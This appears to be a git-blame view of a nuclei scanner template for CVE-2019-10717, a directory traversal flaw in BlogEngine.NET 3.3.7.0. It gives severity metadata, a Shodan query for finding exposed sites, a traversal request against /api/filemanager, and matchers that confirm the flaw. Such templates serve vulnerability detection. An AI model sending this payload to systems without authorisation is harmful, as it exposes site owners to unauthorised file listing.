nuclei-templates/cves/2019/CVE-2019-10717.yaml

42 lines
1.1 KiB
YAML
Raw Normal View History

2022-08-01 07:58:09 +00:00
id: CVE-2019-10717
info:
name: BlogEngine.NET 3.3.7.0 - Directory Traversal
author: arafatansari
2022-08-01 11:02:39 +00:00
severity: high
2022-08-01 07:58:09 +00:00
description: |
BlogEngine.NET 3.3.7.0 allows /api/filemanager Directory Traversal via the path parameter
reference:
- https://www.securitymetrics.com/blog/Blogenginenet-Directory-Traversal-Listing-Login-Page-Unvalidated-Redirect
2022-08-01 11:02:39 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-10717
- https://github.com/rxtur/BlogEngine.NET/commits/master
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
cvss-score: 7.1
cve-id: CVE-2019-10717
cwe-id: CWE-22
2022-08-01 07:58:09 +00:00
metadata:
shodan-query: http.html:"Blogengine.net"
verified: "true"
tags: cve,cve2019,blogengine,lfi,traversal
2022-08-01 07:58:09 +00:00
requests:
2022-08-01 11:02:39 +00:00
- method: GET
path:
- "{{BaseURL}}/api/filemanager?path=%2F..%2f..%2fContent"
2022-08-01 07:58:09 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
- '~/App_Data/files/../../([a-zA-Z0-9\.\-]+)/([a-z0-9]+)'
2022-08-01 11:02:39 +00:00
- type: word
part: header
words:
- "application/json"
2022-08-01 11:02:39 +00:00
- type: status
status:
- 200